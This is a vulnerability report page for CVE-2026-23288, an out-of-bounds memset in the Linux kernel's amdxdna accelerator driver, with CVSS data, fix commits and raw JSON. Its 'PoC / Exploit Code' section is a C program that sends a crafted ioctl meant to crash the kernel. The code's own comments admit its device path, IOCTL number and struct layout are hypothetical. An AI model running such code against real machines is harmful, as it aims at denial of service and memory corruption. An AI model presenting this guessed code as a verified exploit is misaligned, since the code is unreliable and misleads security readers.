Security Vulnerability Report
CVE-2026-23288 CVSS 7.8 HIGH

Published: 2026-03-25 11:16:24
Last Modified: 2026-04-02 15:16:30
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

accel/amdxdna: Fix out-of-bounds memset in command slot handling

The remaining space in a command slot may be smaller than the size of the command header. Clearing the command header with memset() before verifying the available slot space can result in an out-of-bounds write and memory corruption.

Fix this by moving the memset() call after the size validation.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Linux Kernel < Commit 1110a949675ebd56b3f0286e664ea543f745801c
Linux Kernel < Commit cca770d710d5e03bc814af585cd6975eb6d74074

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * PoC for CVE-2026-23288
 * Trigger out-of-bounds memset in Linux kernel accel/amdxdna driver.
 * Requires access to the amdxdna device interface.
 */
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>

// Hypothetical device path and IOCTL definitions based on typical kernel drivers
#define AMDXDNA_DEVICE "/dev/amdxdna0"
#define AMDXDNA_IOCTL_SUBMIT_CMD 0x8001

struct amdxdna_cmd_header {
    uint32_t size;
    uint32_t flags;
    // ... other header fields ...
};

struct amdxdna_cmd {
    struct amdxdna_cmd_header header;
    // Payload data
};

int main(void)
{
    int fd;
    struct amdxdna_cmd cmd;

    // Open the device
    fd = open(AMDXDNA_DEVICE, O_RDWR);
    if (fd < 0) {
        perror("Failed to open device");
        return EXIT_FAILURE;
    }
    printf("[+] Opened %s\n", AMDXDNA_DEVICE);

    // Initialize command with a specific size that triggers the logic flaw
    // The driver expects a minimum size, but the vulnerable code path
    // might memset based on a header size before checking the allocated slot size.
    memset(&cmd, 0, sizeof(cmd));
    cmd.header.size = 0x10; // Small size to potentially trigger validation issue

    // Submit command to kernel
    printf("[*] Sending malicious command...\n");
    if (ioctl(fd, AMDXDNA_IOCTL_SUBMIT_CMD, &cmd) < 0) {
        perror("IOCTL failed");
        close(fd);
        return EXIT_FAILURE;
    }

    printf("[+] Command sent. Check dmesg for kernel OOPS or panic.\n");
    close(fd);
    return EXIT_SUCCESS;
}

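References

https://git.kernel.org/stable/c/1110a949675ebd56b3f0286e664ea543f745801c
https://git.kernel.org/stable/c/cca770d710d5e03bc814af585cd6975eb6d74074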

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23288", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-25T11:16:23.767", "lastModified": "2026-04-02T15:16:30.343", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\naccel/amdxdna: Fix out-of-bounds memset in command slot handling\n\nThe remaining space in a command slot may be smaller than the size of\nthe command header. Clearing the command header with memset() before\nverifying the available slot space can result in an out-of-bounds write\nand memory corruption.\n\nFix this by moving the memset() call after the size validation."}, {"lang": "es", "value": "En el kernel de Linux, se ha resuelto la siguiente vulnerabilidad:\n\naccel/amdxdna: Corrección de memset fuera de límites en el manejo de ranuras de comando\n\nEl espacio restante en una ranura de comando puede ser menor que el tamaño del encabezado de comando. Borrar el encabezado de comando con memset() antes de verificar el espacio de ranura disponible puede resultar en una escritura fuera de límites y corrupción de memoria.\n\nEsto se corrige moviendo la llamada a memset() después de la validación del tamaño."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "references": [{"url": "https://git.kernel.org/stable/c/1110a949675ebd56b3f0286e664ea543f745801c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/cca770d710d5e03bc814af585cd6975eb6d74074", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}]}}